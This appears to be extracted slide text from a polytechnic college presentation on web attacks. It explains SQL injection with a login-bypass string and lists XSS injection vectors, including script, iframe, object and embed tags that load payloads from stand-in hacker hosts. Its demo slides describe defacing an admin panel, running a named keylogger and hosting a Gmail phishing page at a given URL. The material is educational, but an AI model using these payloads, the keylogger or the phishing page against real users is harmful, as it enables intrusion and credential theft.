The technologies vulnerable to this attack are dynamic script

languages including ASP, ASP.NET, PHP, JSP, and CGI. All an
attacker needs to perform an SQL Injection hacking attack is a
web browser, knowledge of SQL queries and creative guess
work to important table and field names. The sheer simplicity
of SQL Injection has fuelled its popularity.

Other contents:
Why is it possible to pass SQL Queries to the database even
though this is hidden behind a firewall?
Is my database at risk to SQL Injection?

RIMT – POLYTECHINIC- COLLEGE

What is the impact of SQL Injection?
Example of a SQL Injection Attack
How do I prevent SQL Injection attacks?

Why is it possible to pass SQL queries directly to a database

that is hidden behind a firewall and any other security
mechanism?
Firewalls and similar intrusion detection mechanisms provide
little or no defense against full-scale SQL Injection web
attacks.

Since your website needs to be public, security mechanisms

will allow public web traffic to communicate with your web
application/s (generally over port 80/443). The web application
has open access to the database in order to return (update)
the requested (changed) information.

In SQL Injection, the hacker uses SQL queries and creativity to

get to the database of sensitive corporate data through the
web application.

SQL or Structured Query Language is the computer language

that allows you to store, manipulate, and retrieve data stored
in a relational database (or a collection of tables which
organise and structure data). SQL is, in fact, the only way that
a web application (and users) can interact with the database.
Examples of relational databases include Oracle, Microsoft
Access, MS SQL Server, MySQL, and Filemaker Pro, all of which
use SQL as their basic building blocks.

SQL commands include SELECT, INSERT, DELETE and DROP

TABLE. DROP TABLE is as ominous as it sounds and in fact will
eliminate the table with a particular name.

In the legitimate scenario of the login page example above, the

SQL commands planned for the web application may look like
the following:

SELECT count(*)
FROM users_list_table
WHERE username=’FIELD_USERNAME’
AND password=’FIELD_PASSWORD”

RIMT – POLYTECHINIC- COLLEGE

In plain English, this SQL command (from the web application)
instructs the database to match the username and password
input by the legitimate user to the combination it has already
stored.

Each type of web application is hard coded with specific SQL

queries that it will execute when performing its legitimate
functions and communicating with the database. If any input
field of the web application is not properly sanitised, a hacker
may inject additional SQL commands that broaden the range of
SQL commands the web application will execute, thus going
beyond the original intended design and function.

A hacker will thus have a clear channel of communication (or,

in layman terms, a tunnel) to the database irrespective of all
the intrusion detection systems and network security
equipment installed before the physical database server.

Is my database at risk to SQL Injection?

SQL Injection is one of the most common application layer

attacks currently being used on the Internet. Despite the fact
that it is relatively easy to protect against SQL Injection, there
are a large number of web applications that remain vulnerable.

According to the Web Application Security Consortium (WASC)

9% of the total hacking incidents reported in the media until
27th July 2006 were due to SQL Injection. More recent data
from our own research shows that about 50% of the websites
we have scanned this year are susceptible to SQL Injection
vulnerabilities.

It may be difficult to answer the question whether your web

site and web applications are vulnerable to SQL Injection
especially if you are not a programmer or you are not the
person who has coded your web applications.

Our experience leads us to believe that there is a significant

chance that your data is already at risk from SQL Injection.

RIMT – POLYTECHINIC- COLLEGE

Whether an attacker is able to see the data stored on the
database or not, really depends on how your website is coded
to display the results of the queries sent. What is certain is
that the attacker will be able to execute arbitrary SQL
Commands on the vulnerable system, either to compromise it
or else to obtain information.

If improperly coded, then you run the risk of having your

customer and company data compromised.

What an attacker gains access to also depends on the level of

security set by the database. The database could be set to
restrict to certain commands only. A read access normally is
enabled for use by web application back ends.

Even if an attacker is not able to modify the system, he would

still be able to read valuable information.

What is the impact of SQL Injection?

Once an attacker realizes that a system is vulnerable to SQL
Injection, he is able to inject SQL Query / Commands through
an input form field. This is equivalent to handing the attacker
your database and allowing him to execute any SQL command
including DROP TABLE to the database!

An attacker may execute arbitrary SQL statements on the

vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information. Depending on
the back-end database in use, SQL injection vulnerabilities
lead to varying levels of data/system access for the attacker. It
may be possible to manipulate existing queries, to UNION
(used to select related information from two tables) arbitrary
data, use subselects, or append additional queries.

In some cases, it may be possible to read in or write out to

files, or to execute shell commands on the underlying
operating system. Certain SQL Servers such as Microsoft SQL
Server contain stored and extended procedures (database
server functions). If an attacker can obtain access to these
procedures, it could spell disaster.

Unfortunately the impact of SQL Injection is only uncovered

when the theft is discovered. Data is being unwittingly stolen
through various hack attacks all the time. The more expert of
hackers rarely get caught.

RIMT – POLYTECHINIC- COLLEGE

Example of a SQLInjection Attack
Here is a sample basic HTML form with two inputs, login and
password.

<form method="post"
action="http://testasp.vulnweb.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for the login.asp to work is by building a

database query that looks like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’

If the variables $username and $password are requested

directly from the user's input, this can easily be compromised.
Suppose that we gave "Joe" as a username and that the
following string was provided as a password: anything' OR
'x'='x

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

As the inputs of the web application are not properly sanitised,

the use of the single quotes has turned the WHERE SQL
command into a two-component clause.

The 'x'='x' part guarantees to be true regardless of what the

first part contains.

This will allow the attacker to bypass the login form without
actually knowing a valid username / password combination!

How do I prevent SQL Injection attacks?

Firewalls and similar intrusion detection mechanisms provide

little defense against full-scale web attacks. Since your
website needs to be public, security mechanisms will allow
public web traffic to communicate with your databases servers

RIMT – POLYTECHINIC- COLLEGE

through web applications. Isn’t this what they have been
designed to do?

Patching your servers, databases, programming languages and

operating systems is critical but will in no way the best way to
prevent SQL Injection Attacks.

RIMT – POLYTECHINIC- COLLEGE

 Cross Site Scripting(XSS)

What is Cross Site Scripting?

Hackers are constantly experimenting with a wide repertoire of
hacking techniques to compromise websites and web
applications and make off with a treasure trove of sensitive
data including credit card numbers, social security numbers
and even medical records.

Cross Site Scripting (also known as XSS or CSS) is generally

believed to be one of the most common application layer
hacking techniques.
In the pie-chart below, created by the Web Hacking Incident
Database for 2011 (WHID) clearly shows that whilst many
different attack methods exist, SQL injection and XSS are the
most popular. To add to this, many other attack methods, such
as Information Disclosures, Content Spoofing and Stolen
Credentials could all be side-effects of an XSS attack.

In general, cross-site scripting refers to that hacking technique

that leverages vulnerabilities in the code of a web application
to allow an attacker to send malicious content from an end-
user and collect some type of data from the victim.

RIMT – POLYTECHINIC- COLLEGE

Today, websites rely heavily on complex web applications to
deliver different output or content to a wide variety of users
according to set preferences and specific needs. This arms
organizations with the ability to provide better value to their
customers and prospects. However, dynamic websites suffer
from serious vulnerabilities rendering organizations helpless
and prone to cross site scripting attacks on their data.

"A web page contains both text and HTML markup that is
generated by the server and interpreted by the client browser.
Web sites that generate only static pages are able to have full
control over how the browser interprets these pages. Web
sites that generate dynamic pages do not have complete
control over how their outputs are interpreted by the client.
The heart of the issue is that if mistrusted content can be
introduced into a dynamic page, neither the web site nor the
client has enough information to recognize that this has
happened and take protective actions." (CERT Coordination
Center).

Cross Site Scripting allows an attacker to embed

malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a
vulnerable dynamic page to fool the user, executing the script
on his machine in order to gather data. The use of XSS might
compromise private information, manipulate or steal cookies,
create requests that can be mistaken for those of a valid user,
or execute malicious code on the end-user systems. The data is
usually formatted as a hyperlink containing malicious content
and which is distributed over any possible means on the
internet.
As a hacking tool, the attacker can formulate and distribute a
custom-crafted CSS URL just by using a browser to test the
dynamic website response. The attacker also needs to know
some HTML, JavaScript and a dynamic language, to produce a
URL which is not too suspicious-looking, in order to attack a
XSS vulnerable website.

Any web page which passes parameters to a database can be

vulnerable to this hacking technique. Usually these are present
in Login forms, Forgot Password forms, etc…

N.B. Often people refer to Cross Site Scripting as CSS or XSS,

which is can be confused with Cascading Style Sheets (CSS).

The Theory of XSS

RIMT – POLYTECHINIC- COLLEGE

In a typical XSS attack the hacker infects a legitimate web
page with his malicious client-side script. When a user visits
this web page the script is downloaded to his browser and
executed. There are many slight variations to this theme,
however all XSS attacks follow this pattern, which is depicted
in the diagram below.

As a web developer you are putting measures in place to

secure the first step of the attack. You want to prevent the
hacker from infecting your innocent web page with his
malicious script. There are various ways to do that, and this
article goes into some technical detail on the most important
techniques that you must use to disable this sort of attack
against your users.

XSS Attack Vectors

So how does a hacker infect your web page in the first place?
You might think, that for an attacker to make changes to your
web page he must first break the security of the web server
and be able to upload and modify files on that server.
Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They

are dynamic and filled with ever changing content. Modern
web pages pull data from many different sources. This data is
amalgamated with your own web page and can contain simple

RIMT – POLYTECHINIC- COLLEGE

text, or images, and can also contain HTML tags such as <p>
for paragraph, <img> for image and <script> for scripts. Many
times the hacker will use the ‘comments’ feature of your web
page to insert a comment that contains a script. Every user
who views that comment will download the script which will
execute on his browser, causing undesirable behaviour.
Something as simple as a Facebook post on your wall can
contain a malicious script, which if not filtered by the Facebook
servers will be injected into your Wall and execute on the
browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land
on your web page from an external source has the potential of
being infected with a malicious script, but in what form does
the data come?

<SCRIPT>
The <SCRIPT> tag is the most popular way and sometimes
easiest to detect. It can arrive to your page in the following
forms:

External script:

<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
Embedded script:

<SCRIPT> alert(“XSS”); </SCRIPT>

<BODY>
The <BODY> tag can contain an embedded script by using the
ONLOAD event, as shown below:

<BODY ONLOAD=alert("XSS")>
The BACKGROUND attribute can be similarly exploited:

<BODY BACKGROUND="javascript:alert('XSS')">
<IMG>
Some browsers will execute a script when found in the <IMG>
tag as shown here:

<IMG SRC="javascript:alert('XSS');">
There are some variations of this that work in some browsers:

<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME>

RIMT – POLYTECHINIC- COLLEGE

The <IFRAME> tag allows you to import HTML into a page. This
important HTML can contain a script.

<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT>
If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it
can be manipulated to embed a script:

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<LINK>
The <LINK> tag, which is often used to link to external style
sheets could contain a script:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<TABLE>
The BACKGROUND attribute of the TABLE tag can be exploited
to refer to a script instead of an image:

<TABLE BACKGROUND="javascript:alert('XSS')">
The same applies to the <TD> tag, used to separate cells
inside a table:

<TD BACKGROUND="javascript:alert('XSS')">
<DIV>
The <DIV> tag, similar to the <TABLE> and <TD> tags can also
specify a background and therefore embed a script:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

The <DIV> STYLE attribute can also be manipulated in the
following way:

<DIV STYLE="width: expression(alert('XSS'));">

<OBJECT>
The <OBJECT> tag can be used to pull in a script from an
external site in the following way:

<OBJECT TYPE="text/x-scriptlet"
DATA="http://hacker.com/xss.html">
<EMBED>
If the hacker places a malicious script inside a flash file, it can
be injected in the following way:

<EMBED SRC="http://hacker.com/xss.swf"
AllowScriptAccess="always">
Is your site vulnerable to Cross Site Scripting?

RIMT – POLYTECHINIC- COLLEGE

Our experience leads us to conclude that the cross-site
scripting vulnerability is one of the most highly widespread
flaw on the Internet and will occur anywhere a web application
uses input from a user in the output it generates without
validating it. Our own research shows that over a third of the
organizations applying for our free audit service are vulnerable
to Cross Site Scripting. And the trend is upward.

Example of a Cross Site Scripting Attack

As a simple example, imagine a search engine site which is
open to an XSS attack. The query screen of the search engine
is a simple single field form with a submit button. Whereas the
results page, displays both the matched results and the text
you are looking for.

Search Results for "XSS Vulnerability"

To be able to bookmark pages, search engines generally leave

the entered variables in the URL address. In this case the URL
would look like:

http://test.searchengine.com/search.php?q=XSS%20

Vulnerability

Next we try to send the following query to the search engine:

<script type="text/javascript"> alert ('This is an XSS

Vulnerability') </script>

By submitting the query to search.php, it is encoded and the

resulting URL would be something like:

http://test.searchengine.com/search.php?q=%3Cscript%3

Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%2

9%3C%2Fscript%3E

Upon loading the results page, the test search engine would
probably display no results for the search but it will display a
JavaScript alert which was injected into the page by using the
XSS vulnerability.

RIMT – POLYTECHINIC- COLLEGE

How to Check for Cross Site Scripting
Vulnerabilities
To check for Cross site scripting vulnerabilities, use a Web
Vulnerability Scanner. A Web Vulnerability Scanner crawls your
entire website and automatically checks for Cross Site
Scripting vulnerabilities. It will indicate which URLs/scripts are
vulnerable to these attacks so that you can fix the
vulnerability easily. Besides Cross site scripting vulnerabilities
a web application scanner will also check for SQL injection &
other web vulnerabilities.
Acunetix Web Vulnerability Scanner scans for SQL injection,
Cross site scripting, Google hacking and many more
vulnerabilities.
Preventing Cross Site Scripting Attacks

The purpose of this article is define Cross Site Scripting

attacks and give some practical examples. Preventing XSS
attacks requires diligence from the part of the programmers
and the necessary security testing. You can learn more about
preventing cross-site scripting attacks here.

RIMT – POLYTECHINIC- COLLEGE

 Working of xss

SQL INJECTION DEMO

FOLLOWING WEBSITE IS USED FOR SQL
INJECTION

RIMT – POLYTECHINIC- COLLEGE

ATTACK DOES

1.Opens the admin panel .

2.Crack all the user sensitive information.
3.Able to acess all user table .

RIMT – POLYTECHINIC- COLLEGE

 4.After log in admin panel we can make
changes and deface the site .
5.We got important log in information which
can be misused

Hacked :

Keylogger Demo
Following keylogger is used Emissary
Keylogger

RIMT – POLYTECHINIC- COLLEGE

Attack Does:

1.Get all the log files and the keystrokes of

the victim computer
2.Bring all the screen shot
3.Disable all the regedit.exe
4.Diable the task manager
5.Block the listed sites by the attacker
Phishing Demo

RIMT – POLYTECHINIC- COLLEGE

EXECUTING PHISHING ON WELL KNOWN
SITE GMAIL

Link : http://freethemes00.t35.com/gmail%20login/

ATTACK DOES:

1.Get the victim gmail username and

password
2. Site can be any it may be your
bank account site

RIMT – POLYTECHINIC- COLLEGE